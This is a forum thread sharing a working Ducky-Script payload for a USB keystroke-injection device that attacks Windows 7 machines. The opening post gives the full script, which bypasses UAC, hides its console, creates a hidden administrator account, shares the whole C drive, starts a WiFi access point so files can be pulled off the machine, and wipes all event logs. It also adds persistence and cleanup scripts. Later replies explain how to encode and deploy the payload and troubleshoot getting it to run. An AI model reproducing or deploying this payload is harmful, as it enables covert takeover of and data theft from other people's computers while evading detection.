Jump to content

[Payload] Exfiltration via WiFi


Darren Kitchen
 Share

Recommended Posts

I wrote this to quickly and easily exfiltrate data from a target Windows 7 machine. It's successful in sharing data without setting off alarms by touching the network or mounting mass storage.

This payload adds a hidden admin user with NTFS privs for the C drive, enables file and printer sharing, shares the C drive and create a WiFi SoftAP on the target Windows 7 machine. Logs are cleaned on exit.

It may be better suited for exfiltration as you only require physical access to the machine for 15-20 seconds, thereafter you only require wifi proximity to download (or upload) files. Of course your target requires a wireless Interface.

I'm using a new UAC bypass and terminal obfuscation technique which could be applied to your payloads.

Payload

REM Payload: Exfiltration via WiFi SoftAP
REM Target: Windows 7
REM Author: Darren Kitchen

REM *** Initial Delay *** 
DELAY 2000

REM *** Bypass UAC ***
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500

REM *** Make console light yellow on bright white and very tiny ***
STRING color FE
ENTER
STRING mode con:cols=14 lines=1
ENTER

REM *** Add User techsupport ***
STRING copy con techsupport.cmd
ENTER
STRING net User techsupport techsupport /ADD
ENTER

REM *** Add User techsupport to Admin Group ***
STRING net LocalGroup Administrators techsupport /ADD
ENTER

REM *** Hide User techsupport ***
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v techsupport /t REG_DWORD /d 0 /f
ENTER

REM *** Enable File and Printer Sharing ***
STRING netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
ENTER

REM *** Share C Drive and grant techsupport NTFS privs ***
STRING net share techsupport=c:\ /UNLIMITED
ENTER
STRING icacls c:\users\* /grant techsupport:(OI)(CI)F
ENTER

REM *** Bring up any WiFi Interfaces on the PC ***
STRING netsh interface set interface name="Wireless Network Connection" admin=enabled
ENTER
STRING netsh interface set interface name="Wireless Network Connection 2" admin=enabled
ENTER
STRING netsh interface set interface name="Wireless Network Connection 3" admin=enabled
ENTER

REM *** Start software Wireless Access Point ***
STRING netsh wlan set hostednetwork ssid=techsupport key=techsupport
ENTER
STRING netsh wlan start hostednetwork
ENTER

REM *** Clear log files and exit ***
STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
ENTER
STRING exit
ENTER
CTRL z
ENTER

REM *** Run Payload and Minimize ***
STRING techsupport.cmd
ENTER
ALT SPACE
DELAY 100
STRING n

Usage

After deploying payload on target Windows 7 PC connect to the SoftAP from another machine (SSID techsupport Password techsupport) and browse to the C drive share (techsupport) with username techsupport and password techsupport.

Post-Exploitation Cleanup

From the C drive share over WiFi upload the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd

del c:\windows\system32\techsupport.cmd
net user techsupport /delete
net share techsupport /delete
for /f %x in ('wevtutil el') do wevtutil cl "%x"
del "%~f0"

Persistence

Alternatively if you would like the techsupport user, share and network to be available all of the time consider adding the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd

netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
netsh interface set interface name="Wireless Network Connection" admin=enabled
netsh interface set interface name="Wireless Network Connection 2" admin=enabled
netsh interface set interface name="Wireless Network Connection 3" admin=enabled
netsh wlan set hostednetwork ssid=techsupport key=techsupport
netsh wlan start hostednetwork
Link to comment
Share on other sites

  • 2 weeks later...

im not understanding the payload toolkit and using custom scripts. i understand the inject.bin needs to be on the duck but each time i use the toolkit is it creating a custom inject.bin for that payload? how do i use this exfiltration script? just type it in payload.txt??

Link to comment
Share on other sites

1. Type it into a text file, using your favourite editor: nano, vi, notepad, notepad++.

2. Save as txt file eg. payload.txt

3. run the file through the encoder to generate a new inject.bin eg. java -jar encoder -i payload.txt -o /path/to/sdcard/inject.bin

4. put the sdcard into the ducky

5. put the ducky into the computer

The ducky reads the inject.bin file for instructions, the plain-text language above is the high-level programming language called Ducky-Script.

Link to comment
Share on other sites

1. Type it into a text file, using your favourite editor: nano, vi, notepad, notepad++.

2. Save as txt file eg. payload.txt

3. run the file through the encoder to generate a new inject.bin eg. java -jar encoder -i payload.txt -o /path/to/sdcard/inject.bin

4. put the sdcard into the ducky

5. put the ducky into the computer

The ducky reads the inject.bin file for instructions, the plain-text language above is the high-level programming language called Ducky-Script.

thank you for the reply midnite snake as i understand that the encoder is used in order to complete a custom payload ;) however when this script runs it brings up the recycle bin and then trys to rename a file?? has anyone tested this script outside of darren? could my delays be off? please see video i took here @Dropbox http://db.tt/QiZ70olQ

Link to comment
Share on other sites

ok so i was able to tweak the delays and found that helping however still not working completely. i found that the wireless network connection was being setup but not enabled.

attachicon.gifUntitled.png

Its good that you've worked out that you need to tweak the timings, but just to check what firmware are you using stock/community?

Link to comment
Share on other sites

It's not bringing up "Wireless Network Connection 2" and "Wireless Network Connection 3" most likely because they do not exist. In testing my target machine had 3 wireless adapters so I'd bring them all up. Most PCs will only have 1 labeled "Wireless Network Connection"

(btw this is why I prefer Linux's wlan0, wlan1, wlan2, etc...)

Link to comment
Share on other sites

Its good that you've worked out that you need to tweak the timings, but just to check what firmware are you using stock/community?

i'm understanding that shipped is stock firmware. i have visited https://forums.hak5.org/index.php?/topic/28254-tutorial-re-flashingupgrading-the-ducky-winxp-32bit/ and the documentation is old. i've done everything except downloading the zip file as it no longer exists. how am i able to flash firmware?

Link to comment
Share on other sites

flashed with 2.1 hex just fine. the exfiltration payload runs better than before, please see pastebin of cmd prompt output. also attached is network adapters, wifi2 setup and enabled with an ssid of techsupport. still not seeing the ssid from another machine??

http://pastebin.com/GP3CVSci

http://imgur.com/j9cj5tP,HV0ZOji#0 j9cj5tP.jpg

http://imgur.com/j9cj5tP,HV0ZOji#1 HV0ZOji.jpg

Edited by tecra
Link to comment
Share on other sites

  • 1 month later...

Hi Darren / guys

Have run the USB exfiltration script and it works great! As for the wifi script - What Version Duck Encoder was this created on?

I ran this in Ver 2.4 and the payload writes fine, hopped over to Kali Linux and have been able to hook up to techsupport hidden network but I'm not seeing my computer name listed. I'm seeing Windows Networks only. Darren did use Ubuntu in the video -wouldn't expect it to be too different.

I'm almost there - if anybody has had Kali issues and fixed it - I'd sure appreciate a nudge in the right direction!

Thanks

HarryT

Link to comment
Share on other sites

  • 6 months later...

sorry to bring up such an old topic, but i added some of darren's stuff in a big script of my own and the hidden user registry key doesn't work for me. After WinLogon, i don't have the sub-keys SpecialAccounts and UserLIst so i was wondering if anyone knew how to incorporate those into the line darren already posted? i didn't find much when looking up adding sub-keys from a terminal

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...